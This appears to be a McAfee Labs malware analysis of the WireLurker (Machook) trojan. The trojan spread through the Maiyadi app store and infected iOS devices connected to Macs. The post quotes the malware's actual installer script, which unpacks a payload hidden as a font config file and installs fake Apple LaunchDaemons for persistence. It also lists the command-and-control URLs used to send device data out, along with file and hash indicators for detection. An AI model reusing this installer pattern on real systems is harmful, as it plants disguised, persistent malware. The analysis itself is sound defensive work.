Chinese Trojan Hooks Macs, iPhones

“Distrust and caution are the parents of security”–Benjamin Franklin

A recent threat targeting Chinese users of Mac OS X and iPhone came to light yesterday. The malware, called WireLurker, is distributed by the Chinese third-party app store Maiyadi. Since the threat’s discovery, more than 400 applications containing the Trojan were identified at the store.

Two very important characteristics of this Trojan are that infection is propagated from Mac OS X to any iOS device that is connected to the machine, and that even non-jailbroken devices are affected.

The malware arrives when the user downloads the Trojanized application from the alternate app store. The Trojan executes and installs its files to the following folder:

  • /usr/local/machook

The files installed in this folder are then installed as a persistent service in Mac OS X, as shown in the following script:

#!/bin/sh
basepath=`dirname $0`
mkdir -p /usr/local/machook/
unzip -o -q $basepath/FontMap1.cfg -d /usr/local/machook/
sleep 1
cp -rf /usr/local/machook/com.apple.machook_damon.plist /Library/LaunchDaemons/
/bin/launchctl load -wF /Library/LaunchDaemons/com.apple.machook_damon.plist
cp -rf /usr/local/machook/globalupdate /usr/bin/
cp -rf /usr/local/machook/com.apple.globalupdate.plist /Library/LaunchDaemons/
/bin/launchctl load -wF /Library/LaunchDaemons/com.apple.globalupdate.plist
rm -rf /Users/Shared/FontMap1.cfg
rm -rf /Users/Shared/start.sh

At this point, the malware installs a USB hook callback, and waits for any iOS device to be connected to any USB port. It will also report the infection to its control server at this URL:

  • hxxp:// www. comeinbaby. com/app/ getversion.php ?v=%@&adid=%@

Once a device is detected, the malware on Mac OS X performs the following actions to compromise the iOS device:

  • Get a list of all applications installed in the device
  • Get the hardware ID of the device
  • Submit this information to the control server
  • Create a backup on the local disk of all applications on the device
  • Inject the malicious iOS binary into each application
  • Install the applications on the device

Code to get the list of installed applications on the device.

The malware will perform the preceding actions even if the device is not jail broken. To do this, the malware will attempt to install a security profile in the device. This profile contains a fake digital certificate to sign the Trojan packages.

If the user accepts the installation of the security profile, any application signed by the digital certificate can be installed and executed without warning to the user.

After the Trojanized applications are installed on the device, any time the user starts one of them the malware will execute, too.

The malware can steal user information including contacts, bookmarks, email, etc. It can also download and install additional applications to the device without user consent. We have not yet seen other malicious files installed, but it is possible.

This behavior has been reported by users of the Maiyadi app store since August, but may have been overlooked because the blog is not in English:

A user reporting the Machook behavior on August 21.

All files related to the attack seem to have been developed by the same authors. The following information is present in the iOS malware:

com.maiyadi.start
 subject.CN
 &iPhone Developer: li tjcy (967X86AAT5)
 <?xml version="1.0" encoding="UTF-8"?>
 <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "
 <plist version="1.0">
 <dict>
 <key>application-identifier</key>
 <string>YK3M5NA37D.com.maiyadi.start</string>

And the debug information contain the names of two authors:

  •  /Users/lifei/Library/Developer/Xcode/DerivedData/myProject-bempnuunysxoafcdeokuvvfigmze/Build/Intermediates/mac_start.build/Release/mac_start.build/Objects-normal/x86_64/main.o’
  • /Users/kaifazhe/Library/Developer/Xcode/DerivedData/myProject-bempnuunysxoafcdeokuvvfigmze/Build/Intermediates/updateVer.build/Release/updateVer.build/Objects-normal/x86_64/main.o

 

Indicators of Compromise

The malware offers many indicators of compromise that can help detect infected machines, including the presence of one of the following files or folders:

  • /usr/local/machook
  • /tmp/machook.log
  • /Library/LaunchDaemons/com.apple.machook_damon.plist
  • /Library/LaunchDaemons/com.apple.globalupdate.plist

One or more of the following processes:

  • machook
  • update
  • start.sh
  • watch.sh
  • WatchProc
  • Periodicdate
  • Globalupdate
  • Manhua
  • WhatsApp

Network connections to the following domains/urls:

  • hxxp:// www. comeinbaby. com/app/ getversion.php ?v=%@&adid=%@
  • hxxp:// www. comeinbaby. com/app/ app.php ?sn=%s&pn=%s&mn=%s&pv=%s&appid=%s&os=macservice&pt=%s&msn=%@&yy=%s
  • hxxp:// www. comeinbaby. com/mac/saveinfo.php
  • hxxp:// www. comeinbaby. com/mac/ getipa2.php?sn=%@
  • hxxp:/ /www. manhuaba. com.cn/active/?udid=%@

The connections above may use the following user agent:

  • User-Agent: globalupdate (unknown version) CFNetwork/720.0.9 Darwin/14.0.0

List of known MD5s:

  • 15E8728B410BFFFDE8D54651A6EFD162  BikeBaron
  • 2B79534F22A89F73D4BB45848659B59B  pphelper
  • 358C48414219FDBBBBCFF90C97295DFF  watch.sh
  • 3FA4E5FEC53DFC9FC88CED651AA858C6  start (2).sh
  • 582FCD682F0F520E95AF1D0713639864  sfbase_v4000.dylib
  • 5B43DF4FAC4CAC52412126A6C604853C  machook
  • 6B74F8A5B055635BD306D06F20B6D0BC  PPAppInstall_qudaobao
  • 7B9E685E89B8C7E11F554B05CDD6819A  7b9e685e89b8c7e11f554b05cdd6819a
  • 9037CF29ED485DAE11E22955724A00E7  globalupdate
  • 93658B52B0F538C4F3E17FDF3860778C  update
  • 9ADFD4344092826CA39BBC441A9EB96F  start.sh
  • A72FDBACFD5BE14631437D0AB21FF960  WatchProc
  • A8DFBD54DA805D3C52AFC521AB7B354B  itunesupdate
  • AA6FE189BAA355A65E6AAFAC1E765F41  periodicdate
  • AB8E4D0C0182BA9699E048B067F7F669  manhua
  • BC3AA0142FB15EA65DE7833D65A70E36  sfbase.dylib
  • C4264B9607A68DE8B9BBBE30436F5F28  com.apple.appstore.PluginHelper
  • C9841E34DA270D94B35AE3F724160D5E  CleanApp
  • DCA13B4FF64BCD6876C13BBB4A22F450  com.apple.MailServiceAgentHelper
  • DEA26A823839B1B3A810D5E731D76AA2  stty5.11.pl
  • E03402006332A6E17C36E569178D2097  systemkeychain-helper
  • E3A61139735301B866D8D109D715F102  start
  • E40DE392C613CD2F9E1E93C6FFD05246  sfbase_v4001.dylib
  • ECB429951985837513FDF854E49D0682  machook (3)

Windows Version:

  • ECA91FA7E7350A4D2880D341866ADF35  WhatsAppMessenger 2.11.7.exe

 

Other Resources

A detailed analysis by Palo Alto Networks of both the Windows and Mac OS X variants of this malware can be found at these links:

As usual, remember that to be safe, you have to act safely. Never download applications from unknown or untrusted sources, don’t click on links sent by any messaging system, even if they appear to come from a known person, and keep all your software up to date and your security products enabled.

McAfee users are protected against this threat in the latest DATs. The threat is detected as OSX/Machook, OSX/Machook.a, OSX/Machook.b, and OSX/Machook.c. SiteAdvisor users are also protected from downloading the malware because the domain is already classified as malicious.

 

Introducing McAfee+

Identity theft protection and privacy for your digital life

FacebookLinkedInTwitterEmailCopy Link

Stay Updated

Follow us to stay updated on all things McAfee and on top of the latest consumer and mobile security threats.

FacebookTwitterInstagramLinkedINYouTubeRSS

More from McAfee Labs

Back to top